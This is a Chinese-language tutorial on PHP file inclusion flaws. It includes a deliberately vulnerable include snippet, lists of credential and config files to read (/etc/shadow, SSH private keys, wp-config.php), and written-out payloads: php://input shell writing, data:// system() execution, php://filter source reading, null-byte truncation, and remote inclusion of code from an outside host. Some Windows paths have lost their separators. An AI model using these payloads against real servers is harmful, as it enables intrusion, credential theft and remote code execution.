WEB常见漏洞之文件包含（基础原理篇）

include()require()include_once()require_once()

require()，找不到被包含的文件时会产生致命错误，并停止脚本运行。include()，找不到被包含的文件时只会产生警告，脚本将继续运行。include_once()与include()类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含。require_once()与require()类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含。

<?php$filename=$_REQUEST['filename'];include $filename;?>

c:boot.ini // 查看系统版本c:windowssystem32inetsrvMetaBase.xml // IIS配置文件c:windowsrepairsam // 存储Windows系统初次安装的密码c:ProgramFilesmysqlmy.ini // MySQL配置c:ProgramFilesmysqldatamysqluser.MYD // MySQL root密码c:windowsphp.ini // php 配置信息

/etc/passwd // 账户信息/etc/shadow // 账户密码文件/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置/usr/local/app/php5/lib/php.ini // PHP相关配置/etc/httpd/conf/httpd.conf // Apache配置文件/etc/my.conf // mysql 配置文件

上传带有shell的图片，利用包含漏洞getshell读取文件内容，如php源代码包含日志文件来getshell包含 proc/self/environ 来getshellphpinfo包含临时文件

file:// 访问本地文件系统http(s):// 访问 HTTPs 网址ftp:// 访问 ftp URLphp:// 访问输入/输出流Zlib:// 压缩流Data:// 数据Ssh2:// security shell2Expect:// 处理交互式的流Glob:// 查找匹配的文件路径phar:// PHP归档rar:// RARogg:// 音频流

1. file://（1）这个协议可以展现本地文件系统，默认目录是当前的工作目录。（2）例如：file:///etc/passwd、file://key.txt2. php://(1) php://input是个可以访问请求的原始数据的只读流，可以访问请求的原始数据的只读流，将post请求中的数据作为php代码执行。(2) php://filter是一种元封装器，设计用于数据流打开时的筛选过滤应用。3.phar://（1）phar://数据流包装器自PHP5.3.0起开始有效（2）例如：phar://E:/phpstudy/www/1.zip/phpinfo.txtphar://1.zip/phpinfo.txt

php://条件：php<5.0，allow_url_include=off 能使用      php>5.0，allow_url_fopen=On 能使用例子：include.php?filename=php://input，然后在post请求中通过input把语句上传执行<?php fputs(fopen("shell.php","a"),"<?php phpinfo();?>") ?>

data://为数据流封装器，data:URI schema，利用data://进行远程代码执行思路与php://类似，都是利用php中的流将原本include的文件的文件流，将原版的include文件重定向到用户可控的数据流中。条件：allow_url_include=on，php>5.2例子：include.php?filename=data://text/plain,<?php system(id)?>base64变形：include.php?filename=data://text/plain;base64,PD9waHAgc3lzdGVtKHdob2FtaSk/Pg==

php://filter可用于查看源码，直接包含php文件时会被解析，不能看到源码，所以需要利用filter来读取，不过需要base64编码加密后才能传输过来。例子：include.php?filename=php://filter/read=convert.base64-encode/resource=include.php

/usr/local/apache2/logs/access_log/logs/access_log/etc/httpd/logs/access_log/var/log/httpd/access_log

dedecms数据库：data/conmmon.inc.phpdiscuz全局：config/config_global.phpphpcms：caches/configs/database.phpphpwind：conf/database.phpwordpress：wp-config.php

windows：  C:/boot.ini //查看系统版本  C:/Windows/System32/inetsrv/Metabase.xml //IIS配置文件  C:/Windows/repairsam //存储系统初次安装的密码  C:/Program Files/mysql/my.ini //mysql配置  C:/Program Files/mysql/data/mysql/user.MYD //mysql root  C:/Windows/php.ini //php配置信息  C:/Winodws/my.ini //mysql配置信息linux：  /root/.ssh/authorized_keys  /root/.ssh/id_rsa  /root/.ssh/id_rsa.keystore  /root/.ssh/known_hosts  /etc/passwd  /etc/shadow  /etc/my.cnf  /etc/httdp/conf/httpd.conf  /root/.bash_history  /root/.mysql_history  /proc/self/fd[0-9]*  /proc/mounts  /proc/config.gz

allow_url_fopen=onallow_url_include=on

注：被包含文件最好是一个txt格式

php < 5.3.4magic_quotes_gpc=off

上传带有木马的图片 文件包含通过00截断访问目标图片，如 test.php?file=x.jpg%00使用蚁剑连接目标

php < 5.2.8文件名要求：linux文件名需长于4096 winodws文件名需长于256

test.php?file=x.jpg………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………

php>=5.3allow_url_fopen=onallow_url_include=on

test.php?file=http://192.168.0.121/x.txt?